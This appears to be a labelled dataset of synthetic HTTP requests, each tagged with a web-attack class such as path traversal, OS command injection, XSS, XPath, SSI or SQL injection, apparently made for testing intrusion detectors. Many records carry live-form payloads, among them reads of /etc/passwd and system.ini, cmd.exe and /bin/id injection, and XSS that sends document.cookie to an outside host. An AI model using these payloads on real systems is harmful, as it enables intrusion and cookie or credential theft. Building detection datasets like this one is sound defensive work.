Warning: 378 www.aTda.shtml:90489 "edshyitsh0maewoeo" "Thu, 15 Jun 06 01:26:06 UTC"
X-Forwarded-For: 200.112.50.72
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48478
Start - Id: 45707
class: PathTransversal
GET /avaxlTWL_017/zS2475jiXZ6l/sZi4T/s80ZFKsz0N2nFBrNrvRa.html?aa3e7aiA0=ihttpstnlo%7Cpsidob&az9=duaae&leda5fIavmEqbe=++&Qo-G=569883&NQeXd=eeeo4eemtqse&samnc.inputV.hBZ=fte+oa%7Ekhes&abdfjelTitA2C=sGUNCNPVj5&tdttEhmsl4zc=yF9rh%3Dndr%7Cr&dgnRGs08hc2hC6i=a%27+dr&Rh=fDertnso7ts&0tTAaowte7IFn=..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&4s=q HTTP/1.0
Host: www.t2Rwhht8au.ch
Connection: close
Accept: image/png, text/xml, audio/*;q=0.9
Accept-Charset: x-mac-korean, x-mac-arabic, us-ascii
Accept-Encoding: deflate, compress, identity;q=0.4
Accept-Language: NItzsf-moc;q=0.5, y7-eetn;q=0.3, eowdeno-v;q=0.3, wopng-vttotnc;q=0.6
Cache-Control: no-transform
Client-ip: 8.138.141.106
Cookie: 9d=u6GUD705
Cookie2: $Version="894"
Date: Fri, 05 Dec 08 20:29:28 CET
ETag: "W2cyccIkLZi2-vmxGbfE"
Expect: 100-continue
From: eajtut@smge.gov
If-Modified-Since: Sun, 23 Apr 06 15:47:38 CET
If-Unmodified-Since: Thu, 07 Jan 10 09:43:21 UTC
If-Match: "FdXggJieooHhEIL"
If-None-Match: "uCmYFFYx004KMs_I-TE"
If-Range: Sat, 19 May 07 22:51:51 UTC
Max-Forwards: 76
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic b3VyZ2NvZTppaHNy
Range: 8441-
Referer: http://wnh8e.de/hsEchRsw/9Yssez/7eoegn.php4
TE: trailers,chunked;q=0.3,trailers
Trailer: Cache-Control
User-Agent: Mozilla/5.6 (X11; U; Linux i586 2.0; rl-Lo; rv:8.0.8) Gecko/15636895
UA-CPU: Sparc
UA-Disp: 8763,047,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 967x7308
Via: HTTP/8.6 www.rr8w.css, 0.1 186.99.51.155
Transfer-Encoding: pnvti; lsje=rhoslifs
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 288 223.210.181.104 "nzlia9itn3swklmex" "Fri, 29 Apr 05 08:27:02 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45707
Start - Id: 36638
class: OsCommanding
GET /handler;cat /etc/passwd| ? HTTP/1.1
Host: www.uBxt.net:80
Connection: close
Accept: text/html
Accept-Charset: windows-1255;q=0.3
Accept-Encoding: 
Accept-Language: 6on-uedcth, n-bav, iSm6mMea-afm;q=0.0, 5i5ee-kiW
Cache-Control: max-age=4
Cookie: ndhpl1snthiiQp=7;leEd=gxp_tr $foooh slnetcrmCe;eawsnHacaRria=173529427;17sswut=eT04Uyyks;hfseenI=77777982;tsrnfts=psc e 
Cookie2: $Version="74"
Date: Sun, 13 Nov 05 14:18:07 UTC
ETag: W/"Uz@kS7@BDhdUUqlE@y."
If-Modified-Since: Mon, 11 Feb 08 21:11:40 GMT
If-Unmodified-Since: Sat, 02 Feb 08 04:58:33 GMT
If-Match: *
Max-Forwards: 1218
Referer: http://4vsee.cz/ndares/zegeTSTq/sioAquih/hOshioa/sDuedi.gif
TE: chunked,trailers,deflate;q=0.5
Trailer: Range
User-Agent: cfed/6.6.2.2
Via: rcse/6.0 www.iins7on.htm

null

End - Id: 36638
Start - Id: 47204
class: XSS
GET /WhttpshGWX5EellVVLD/yG6uSHtTs/tXvI0MRZjMvvhv3sb/teslktnnfome9r1rhh/BuinputB46@bOJ6N/hvh/lrtxE9IhasGodi/cc/Yotaadpwfnz/he.tiff?uNt1ilOekth=3686&pasapncRpd=tQXut29QU1.w&aauLbijuni=kegorb%5Cos++gtnseur&ohAiai=%3Cdiv+style%3D+%22++width%3A++++expression%28%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.icge.com%2Fcgi-bin%2Fni.cgi%27%2Bdocument.cookie%29%3B%5D%29%3B++++%22++%3E&idthin88dhrtdf=82628981&5OQQY6k=ro%3D+vNqe88er%3Cxp_o&eiB5neso=g1wvBiijZ7&ihaving6pXukJ=kutsr&ok9et=StDeeee4twt&lbietaxetf=dQ2aD&openMk6R-Punion=743026&IRECRbD=426948&nmanm3s3snstnwc=3nueg HTTP/1.0
Host: www.ahxn.net
Connection: yd1ir
Accept: */*
Accept-Charset: x-mac-ce, koi8, utf-8;q=0.0
Accept-Encoding: 
Accept-Language: Ortlhgee-BsNishez;q=0.6, A49cr-togew4o, syeoi-uSas;q=0.5, qponn8-wtrpvyA, ksrawt-8rith;q=0.9
Cache-Control: min-fresh=9
Client-ip: 63.161.16.102
Cookie: hotkiEund3ss=8952;src4uheo=xn/passwd;mieEm=0I;e7Esiojretde=]ss;@tMin3AJ=rs'lsW5i~e=wp-[n-
Cookie2: $Version="0"
Date: Fri, 05 Nov 04 23:24:18 UTC
ETag: W/"sgzTyQPOVZPttH244HNT"
Expect: 100-continue
From: oUzNrsR@euuilaosen.cz
If-Modified-Since: Fri, 15 Jul 05 02:54:36 UTC
If-Unmodified-Since: Tue, 31 May 05 10:55:54 CET
If-Match: *
If-None-Match: *
If-Range: "IS_9Bx@9GpcJEoDmb"
Max-Forwards: 99
MIME-Version: 9.5
Pragma: rbmbl=ns
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: Digest response="CE48E90eE2c12EECF4BDF2DCcd180256"
Range: 676-108618,2650-4238
Referer: /5noa/kirtdn13/lai5y/sdttotAe.mdb
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: sqpelAaa (cj8D1i_; eY1tM_jd; 30_1EV44OV)
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 286x017
Via: HTTP/3.5 www.sfdrfbsa.tiff, FTP/4.1 www.Rpf4onp.js, 5.3 www.eEjed8e.html
Transfer-Encoding: 5ore; EErEntt=tRtocaD
Upgrade: urd/1.0
Warning: 160 135.194.21.238 "stoAee6l" "Sat, 24 Jan 09 11:09:16 UTC"
X-Forwarded-For: 42.248.51.9
X-Serial-Number: 04739435468972088
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47204
Start - Id: 35760
class: XPathInjection
GET /soaJu3baludnl/02uCT_MKf41locationpAf/aeodyRhm/Naectjehaevbsiu/nm4E2lnhnoEdiIrn/dc7naesendsuenaRersr/nsagteihtideEi3arlNp/VLa/aOacoue/seaueAduilcb/spatxn252TZdERJ54g9r.htm?n8aJD=niFf2fOdR&twg9selzod=yhlH%27+or++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or+++++%27f1tE%27++%3D+++%27&d03eezc8ueEdi=%25ae%3Atq%5Dandshutdownb%5Dlsam%3Binhp%404&sayCEgsleyAaeur=6&emiarfcre34=o2tdeeknpgleo&hEKybHD59A=5928102&cdumbnteDW=095&ttIooicpan=h0a&di=9e2twrtm&lcmwvmsshrfsadi=fcD&rs8hf=mwp-ish5bonph-lt9at&at=i%40+g&mwZoi=4nn%3Ce&et3zNlf=ethvhe5er HTTP/1.1
Host: www.enddnJ.fr
Connection: close
Accept: image/gif, video/*;q=0.5
Accept-Charset: *
Accept-Encoding: gzip;q=0.5, compress;q=0.0
Accept-Language: *;q=0.9
Cache-Control: min-fresh=94
Client-ip: 54.55.177.74
Cookie: GopenOfchNwHJd=ntpbasthgxpf
Cookie2: $Version="2"
Date: Mon, 23 Feb 04 02:26:51 GMT
ETag: W/"tsvQDtbvV-90U6TPs"
Expect: 100-continue
From: htrqsr@alp77rurTt.com
If-Modified-Since: Thu, 02 Aug 07 08:53:55 UTC
If-Unmodified-Since: Fri, 24 Nov 06 14:03:39 GMT
If-Match: "s9sWM1y4E-05I-8x"
If-None-Match: "Ie1-XHSQv.5nL4m"
If-Range: "XQJ_4Fd1TI3VIeCVyS4D"
Max-Forwards: 84
MIME-Version: 3.7
Pragma: tm='aErtSd'
Proxy-Authorization: Digest qop=auth
Authorization: NTLM ZWVzZDhocm40bnJjbnJJdXJhYzR0bmFlZGcyMXI5c3JkRW9leg==
Range: 9042-41
Referer: http://www.sdrrcTeH.uk/3u9ogr/ybortpf/nlsieat7/drwriruP/c9lc.mpg
TE: chunked
Trailer: Connection
User-Agent: Mozilla/7.5 (Windows; U; Win98 9.2; Rp-na; rv:2.9.4) Gecko/17201792
UA-CPU: x86
UA-Disp: 8135,7731,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 6100x360
Via: 9.9 www.acuneet.htm, fLue/7.9 122.43.133.37
Transfer-Encoding: identity
Upgrade: inuOi/4.6, b70ue/5.1
Warning: 145 165.132.233.207 "niz6ueo" "Sun, 02 Mar 08 13:20:23 UTC"
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 040193563593
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35760
Start - Id: 36505
class: OsCommanding
GET /PBServer/..��../..��../..��../winnt/system32/cmd.exe?/c+dir+c:0 HTTP/1.1
Host: 69.76.12.223
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: nikues-hoah, urtgzbr-boe, nue-4szje, ten0t0P-et;q=0.6
Cache-Control: no-transform
Client-ip: 128.26.229.78
Cookie: sraTrqsCeui=5;dli=itsbeannteu29w
Cookie2: $Version="1"
Date: Sat, 17 Jan 04 24:01:02 CET
ETag: "PbL-0SjZXzb3X6N9tt"
Expect: atcEeo
From: gshio@xxma.be
If-Modified-Since: Tue, 02 Aug 05 13:33:52 GMT
If-Unmodified-Since: Mon, 15 Mar 10 05:55:03 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 26 Jan 04 16:58:28 UTC
Max-Forwards: 9509
MIME-Version: 6.5
Pragma: agsx='llu'
Proxy-Authorization: 0eHre bae13=roeTol
Authorization: e4hot 0eedn=lsehrc4s
Range: 560-980083,973913-
Referer: /cgtpzdah.css
TE: trailers,trailers,chunked;q=0.5
Trailer: From
User-Agent: Mozilla/4.8 (compatible; Konqueror/1.8; Solaris; booh0tcoc)
UA-CPU: MIPS
UA-Disp: 0316,285,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9877x8489
Via: 2.0 55.42.209.45, 1.6 239.46.52.144:8062, 9sh6/4.8 168.212.48.183:524
Transfer-Encoding: identity
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 602 79.223.148.171 "fredebwlteNerqnIji" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36505
Start - Id: 43845
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .com? HTTP/1.1
Host: 89.255.250.196
Connection: close
Accept: video/quicktime;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: 1nn-yF
Cache-Control: max-stale
Client-ip: 85.189.85.166
Cookie: OePic0aui=dzotn;1FsK770kI4s=waoouansHm;icD9iml=tQy0-Fh;Lnull@5Bmk1netcatG=cstewetStiinph-ims;SFss2=)xaperl~dodre~Z1
Cookie2: $Version="07"
Date: Wed, 31 Mar 10 11:51:05 CET
ETag: "Z8MWlRyGtcSU.JT"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Thu, 06 Nov 08 24:34:59 CET
If-Unmodified-Since: Fri, 16 Jun 06 15:09:06 GMT
If-Match: "irp1IvVnJAT7@cT"
If-None-Match: "oKzWEL5pjaNcyRwVY_Kb"
If-Range: Tue, 13 Mar 07 02:44:46 CET
Max-Forwards: 1991
MIME-Version: 1.9
Pragma: aeriel='oyet9ss'
Proxy-Authorization: Basic bEx1ZWN0TjpudGFsZQ==
Authorization: NTLM b25hb2t0Z2kxaGVlZXlvbHRpdXBrZGRqaHkwTjBkdGVvZQ==
Range: 064373-124259,214-265,801-679
Referer: http://www.kwsip.fr/sr7S/tsotfat/hptlg.txt
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.8 (X11; U; Unix 1.8; en-x9; rv:1.2.9) Gecko/27355733
UA-CPU: PowerPC
UA-Disp: 431,094,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 629x1097
Via: 9.0 63.165.157.122, 1.1 www.r2lsna.tiff, FTP/3.8 www.arfsoor.js
Transfer-Encoding: IaUt
Upgrade: hnohEn/1.3, he2eEw/1.1, bncL/6.8, m2jzg/1.9, jtxSa/2.3
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43845
Start - Id: 39604
class: SSI
GET /e6Y8a3/o1t4dxiswssthisoon.php4?yhrayConqbum5Br=%3C%21--+++++%23include++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22--%3E&ciytAc=ao HTTP/1.1
Host: www.ondawe.net
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.4, identity;q=0.8, compress, deflate;q=0.4
Accept-Language: shiunaSs-lmt7v;q=0.7, hfvS2a-Nf4gm7R, vrtorcig-cyn9eees;q=0.7, cs-fOa
Cache-Control: no-store
Client-ip: 239.19.170.214
Cookie: ttyaE4wjf=7145163518;oklike4Mshutdown9w=8;ueaoqQ0seOibemt=eCecQQyDU
Cookie2: $Version="067"
Date: Thu, 06 Jul 06 16:56:51 GMT
ETag: W/"5DYXg9DnNO7-9g7IHY"
Expect: nuEdWa
From: k4wcg@aEdi7a2.de
If-Modified-Since: Thu, 01 Dec 05 06:19:50 CET
If-Unmodified-Since: Fri, 07 Nov 08 20:45:12 CET
If-Match: *
If-None-Match: "7K6CkfYWjKe4J5vA"
If-Range: "cETdaKQjh6AHtN7Dr"
Max-Forwards: 0481
MIME-Version: 2.2
Pragma: ot3i=cigp9q
Proxy-Authorization: Basic a0k3bm9tOm5yYTg=
Authorization: NTLM aWlzaW5oY3M1cnFuY3ZVbWE0T3R0aWU2b2p0OXRpcmU5aTh3bGFiaWFoZWk=
Range: 5591-,251722-40474
Referer: http://ojy8.biz/ardMe.png
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/4.2 (compatible; MSIE 8.4; Mac OS X; nIojd7Enp)
UA-CPU: PowerPC
UA-Disp: 7073,179,8
UA-OS: Win9x
UA-Pixels: 1841x260
Via: 0.8 73.60.218.107, 0.5 www.Weiidih.htm
Transfer-Encoding: compress
Upgrade: blrDl/9.7, eie/1.2, i9hq4/7.4
Warning: 456 21.250.60.163 "ojaOt3inIin" "Sun, 24 Jul 05 04:29:49 CET"
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 51537032626
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 39604
Start - Id: 42415
class: SqlInjection
GET /ebpvmXyPQjOI/ahahezcdo/1A9uIAqydgP/0I/tnnni3i/laeidss7/zT@@xK21/kR8cHBJ9boPSqvNWDf/lodDxI/aOdnC.tiff?NIGwtNa=%27++++OR+++%27bsulz%27++++%3D+N%27+ HTTP/1.0
Host: www.atjsloarmu.com:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.4, identity;q=0.3, identity, compress;q=0.5, identity;q=0.3
Accept-Language: *
Cache-Control: max-stale
Client-ip: 179.176.205.80
Cookie: erong47mhdareol=rhttMvtg5rPdwvltbd;e1AorkPuisa=895581;sonrnlodHse=iklmail7ifromt;-Ny5GdZsm=ioi7Ost;88=sTvoer
Cookie2: $Version="78"
Date: Wed, 10 Aug 05 20:37:58 GMT
ETag: "ihNWxKiFaZe3DCw"
Expect: 100-continue
From: Tm9x@je4xi.it
If-Modified-Since: Thu, 01 Apr 04 14:45:31 CET
If-Unmodified-Since: Sun, 29 Aug 04 03:43:16 GMT
If-Match: "-ffPhpV3OKtYwCFYBc"
If-None-Match: *
If-Range: "idDGCh2fXpJaK9HpvV"
Max-Forwards: 7
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Basic YWV0ZWJwdzplbHdOZm1lcg==
Authorization: NTLM V2hvOXR0dG5uRmF3ZEVhbzllbTF0c1VrZXZpaGk2bklaOGVYVWl3ZW9jZlBk
Range: -975727,63980-89,80-3
Referer: /crao.jpg
TE: trailers
Trailer: Host
User-Agent: dhoatrb6gi
UA-CPU: StrongARM
UA-Disp: 4009,500,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 189x646
Via: 5.6 www.b2o1.htm, FTP/5.6 www.3ej7.html
Transfer-Encoding: compress
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 522 98.185.89.29 "D7lvr5tesig" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42415
Start - Id: 47504
class: XSS
GET /sg6wBrJgl-bGuaS.cfm?QJMAobject3orN=%3Ciframe+src%3D++++%22+vbscript%3A%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.tr.com%2Fcgi-bin%2Fti.cgi%27%2Bdocument.cookie%29%3B%5D+%22++%3E&tytxaseuto=790661&enisyomu=o&1aadebacqn4=tkze7imranekpv&khehm=Fl&rRoUsn=dad&dtantNntii=%3EeIh%3E&te4iszrrs=91039&PQQkuGr1v9T=34284&enrobbItU0dte=iFp7W2EVg&3te=awsse&l8giiipduoaht7N=Nt9e&7oatg2c9=og HTTP/1.0
Host: 86.71.226.123
Connection: e6ee
Accept: */*
Accept-Charset: iso-8859-6;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=42
Client-ip: 121.61.23.210
Cookie: wbasrnTjea=nqo;oRoostsuasrfo=rcpawhere;jel3yamy8t3n=t deletehe2e'tilrjkwhere;teC0ea3EnS=eetodeood0tixaon;nrnwfltt6st=968;hOti8e2sneida=0
Cookie2: $Version="6"
Date: Wed, 16 Aug 06 24:00:16 CET
ETag: W/"mH_4FRfD3DPEqxMbE"
Expect: 100-continue
From: oEh7ee@n2lwamdun.biz
If-Modified-Since: Sun, 30 Jul 06 15:14:33 UTC
If-Unmodified-Since: Wed, 24 Mar 10 10:41:48 GMT
If-Match: "pxzhtupDUMhpB55zD"
If-None-Match: "psPV2ruvNNT45x2-w"
If-Range: "3qb64heoOV4sPCLBw_"
Max-Forwards: 6791
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic aXJvZXA6Y3NlYWFyYg==
Authorization: Basic ZWdycjplaU9lMQ==
Range: 9183-933,-0
Referer: /te0sed.cgi
TE: chunked;q=0.9,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/4.9 (compatible; eTahonatgh; Open BSD i386; zuskoovat)
UA-CPU: PowerPC
UA-Disp: 076,499,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7841x155
Via: FTP/3.4 www.sroerS8s.tiff
Transfer-Encoding: compress
Upgrade: atsa/8.3
Warning: 840 www.salomt.jpg "rNd8aaEbphDe" "Fri, 08 Sep 06 13:06:00 GMT"
X-Forwarded-For: 128.6.45.49
X-Serial-Number: 870651819
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47504
Start - Id: 44665
class: PathTransversal
GET /1bt/teuep/X-YXjeynullUhtaccesX30F.php?YO_aHnM=njsgnpdh3eroar8sga HTTP/1.0
Host: www.h44is.org
Connection: close
Accept: image/*;q=0.8, video/*, image/gif
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: naznie-Betla;q=0.8, heEn2N-5atb;q=0.0, ezKo9ar-lH0lidj, iotarti-rn
Cache-Control: max-age=5422
Client-ip: 235.57.228.230
Cookie: 0arjMadxkMjiUhj=./.././../;ImFh5=ieu
Cookie2: $Version="11"
Date: Wed, 03 Dec 08 16:52:51 UTC
ETag: W/"03igos3NeGh2LAtT1V76"
Expect: 100-continue
From: 8nso@esit2.be
If-Modified-Since: Tue, 16 Jan 07 04:42:06 CET
If-Unmodified-Since: Wed, 13 Jun 07 22:22:21 UTC
If-Match: "tETB4U@x_y66NOiz6CaG"
If-None-Match: *
If-Range: Tue, 07 Aug 07 19:36:50 UTC
Max-Forwards: 6
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM anNlZGlzaTZ3b21lem9kZWphcXdtYndlb290ZGllWnhldGVhZ2t0YWFjaGM=
Authorization: Basic QXdzbGE6bnl2aXRrbw==
Range: -9,4616-
Referer: http://wsrir.com/eo1eee/ere5io/tTAbres.dll
TE: trailers,gzip;q=0.5,trailers
Trailer: Referer
User-Agent: hdEeoov@d http://www.uajpe7s2.fr
UA-CPU: Sparc
UA-Disp: 0905,2233,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 909x4362
Via: FTP/4.7 www.groelan.tiff:7, FTP/0.9 www.4ueRkc.gif, 5.9 www.otaoaei.html
Transfer-Encoding: gzip
Upgrade: ewjer/3.6, iieee/3.2, dbnoN/0.4, afTm/9.7
Warning: 228 172.128.177.184 "teeeuO" 
X-Serial-Number: 7418797826
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44665
Start - Id: 46435
class: PathTransversal
GET /Nthterwvrhaed/otfdX8/peMieyB4I.gif?hauxeroevsy=5&nhmr=nE7enodei&tr=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion HTTP/1.0
Host: www.nVEyuqh.uk
Connection: LeVw
Accept: */*
Accept-Charset: x-mac-korean;q=0.5, iso-8859-2, utf-7;q=0.1
Accept-Encoding: deflate;q=0.9
Accept-Language: *
Cache-Control: no-store
Date: Thu, 17 Jul 08 20:00:55 GMT
ETag: W/"hYCZerIbKrHZOrQX"
Expect: efis=azEs
From: efsAt@teeaL.gov
If-None-Match: "hiGbkOlOzwNnnzNS3g"
Max-Forwards: 85
MIME-Version: 5.7
Pragma: no-cache
Authorization: Digest response="04d791aA5cC5dfa95dD2dDF84c2b9F4F"
Referer: /aHs2si/ostmieC/vga0dl/tBUhS.jsp
User-Agent: e-WGGj http://www.gasSda.be
Upgrade: osljgc/9.8, loaxc/0.1, 7cifs/7.3, icF/3.5, Rilh/0.1
Warning: 313 202.112.44.69 "nhaeb8" "Fri, 09 Jan 09 19:34:44 UTC"

null

End - Id: 46435
Start - Id: 44691
class: PathTransversal
POST /Ihon49ansmtlyso8en/_udrprocessing-instruction3updateohtmpKWUUtmp/Zg/aNrErnbcrdt/1xmlR/vnllitneiewro/7Z90a8VZ6pItmp/geuAia/oaottbioeuUdramru/o1CNKwlxYfY/roYJKhRLc/eOW.YqhO0.jpg? HTTP/1.0
Content-Length: 169
Content-Language: be2saite,v
Content-Encoding: gzip
Content-Location: /a5an.png
Content-MD5: c3lTZWliZGV2b25kYVdnZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 25 Jul 08 07:23:01 UTC
Last-Modified: Thu, 12 Feb 04 11:11:29 CET
Host: 80.143.102.75:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: hz-gb-2312, x-mac-roman, windows-1251, iso-8859-2;q=0.7, x-mac-greek;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 110.199.234.60
Cookie: bmglfmUhnlI=erDD3;hitcsAwRhye=Dtn4j fg;wzisati73p4gsr=38231755
Cookie2: $Version="90"
Date: Sat, 24 Apr 04 10:29:22 GMT
ETag: "RHf0qrb9mHL2t__f2YB"
Expect: saene=nf9tcCm
From: nC0otao@cuVsd.gov
If-Modified-Since: Fri, 02 Jul 04 24:37:04 CET
If-Unmodified-Since: Tue, 01 Dec 09 16:18:34 GMT
If-Match: *
If-None-Match: "SxwS.Y-e6CXloS1Q"
If-Range: *
Max-Forwards: 613
Pragma: no-cache
Authorization: NTLM OW5sczlldGxBaGYzY2luZWJmc3ZmZXRvcnl0bWRlMW9oeWE=
Range: 2168-,8-1607,73-
Referer: http://Cenoph.gov/4dmDytMn/EoMoelAe.jsp
TE: chunked,trailers,deflate;q=0.4
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.4 (compatible; net0dre7io; Linux i386; ms6kl)
UA-CPU: StrongARM
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 136x0173
Via: eLlor5/8.5 www.upsyrnE.shtml:41, elre/2.7 www.hnoi.jpeg
Transfer-Encoding: gzip
Upgrade: eca/0.3
Warning: 868 www.gmor.js "Hn5xrhit" 
X-Forwarded-For: 121.97.240.234
X-Serial-Number: 175251
----: ---------------------------------------------

an=w&rdgohtrreRuct=682101&too8=doc(file:///c:/1ae5a/5nrens.xml     )&metei=2524985&czkwMyiu1us=tDadc@d[ljtuet&lhEb=35058381&xsdeasjertwotep=7518370

End - Id: 44691
Start - Id: 43154
class: OsCommanding
GET /2insert1A4BK.jdD/yh60d/bshe.mdb?ayekwfuue=a-aP&qfFce=897Nd32Gbz&o7wCsarsiSrtem=nWjNmYVy&nd=knyta&unyoi4t=eiTeeciat4AeiyUz&1dtwllotCao=49&2AOtLZa=i8k&8xeehrZgtt3zo=%5C%3B%5C%2Fbin%5C%2Fid+%3B&ancblr=103701&LTpSsgincludeElI=rifromhrlecpylDc&a9=2onbhw&A2G.s0MqUTpR=833781367&hiF=aobjecty&4A0O4=08&eh3sinIIwtu=eao5hpo HTTP/1.0
Host: www.hSsopaakd.org:80
Connection: keep-alive
Accept: text/*, image/*, text/xml;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: UeA-9;q=0.8, es0-eloenaw, Oran-r;q=0.8, csRu-ootsY
Cache-Control: no-store
Client-ip: 66.158.131.150
Cookie: ZgH15j3d=wOo
Cookie2: $Version="08"
Date: Sat, 08 Aug 09 11:59:55 GMT
ETag: "8Si792-o4C3zcdKh6"
Expect: aNg2ee
From: riAeyrh@tgaMea.st
If-Modified-Since: Fri, 06 Apr 07 16:04:23 UTC
If-Unmodified-Since: Sun, 20 Aug 06 22:02:12 GMT
If-Match: "29xzbHIKZc79xaZH9"
If-None-Match: "UoQL0QEGsw-9tk4lG"
If-Range: Fri, 04 May 07 05:47:31 UTC
Max-Forwards: 375
MIME-Version: 1.3
Pragma: dt='6ol'
Proxy-Authorization: NTLM bW9lbndtb250NGE5ZHRscnhuYTI2ZGRyMlNjc2x0cmhGTg==
Authorization: Basic RGVvcGpnNjpkb3RpT0hl
Range: 46359-,93372-15,76-
Referer: /eeare/oJu4is/ffc3him/onEb6/oa1Ert.jpeg
TE: gzip;q=0.4,trailers
Trailer: Host
User-Agent: Mozilla/1.6 (Windows; U; Windows NT 0.0; eb-rn; rv:6.3.3) Gecko/09733550
UA-CPU: Sparc
UA-Disp: 309,0830,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 807x674
Via: FTP/8.3 38.33.121.80
Transfer-Encoding: Wmpl; t8baeaea=eetcsl
Upgrade: sPlrA/2.7, nth/6.0, S4hn/1.6, eStqn/4.6, aarg/7.7
Warning: 027 www.snsA.shtml "dncghr1daAmsfa" 
X-Forwarded-For: 9.181.32.5
X-Serial-Number: 97812200258960530552
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43154
Start - Id: 48225
class: XSS
PUT /Ck/mmpc/nVFCAD267LRJzakVA/EensLy3s0/isyseryln/e33lm/07yv0C98u@Hb__Gs/aX6c_wzmgo/g3No8eoiueidticwieoo/MMG_yxmlXechoiObE/tC9xgWYxb_Mz-A/2muex8gnresgA.jsp? HTTP/1.1
Content-Length: 133
Content-Language: ro,r
Content-Encoding: gzip
Content-Location: /h1meyi/tEpfhteg/faib1ni/rbTDr/wshor1.exe
Content-MD5: YnR0ZHI4Q3R1dGVveWhzbg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Nov 04 12:33:51 UTC
Last-Modified: Sat, 26 Feb 05 18:32:03 UTC
Host: 180.148.194.169:67333
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: doeee-cm, enqtvu-uOi1, 7ajise-u
Cache-Control: max-stale
Client-ip: 250.110.180.51
Cookie: dhbhl=<img src=&{[alert    ('ee76E');]};    >;eseetsS=4;cSde7LktLjxrfmn=ftoooie;cdz9entnonIfl=8osortEo)xtIG5nhtpasso&cls;7ohMG1=p;uto=ars
Cookie2: $Version="638"
Date: Wed, 21 Apr 04 21:03:07 GMT
ETag: W/"cpFzrcC@6hyaKzz"
If-Modified-Since: Fri, 09 Mar 07 09:58:17 UTC
If-Match: "p8m7d-.-9UIz6JuHANB"
If-Range: *
Max-Forwards: 783
Authorization: Digest response="9Fa1AF78AFCAADC5CEa0ACE3f0e14Bd0"
Referer: /1nc31/trstl/iauuen/xut1y4t/elu1EdcR.wmn
TE: gzip;q=0.4,trailers,trailers
User-Agent: advirenoye/5.2.0.3
UA-Pixels: 1593x216
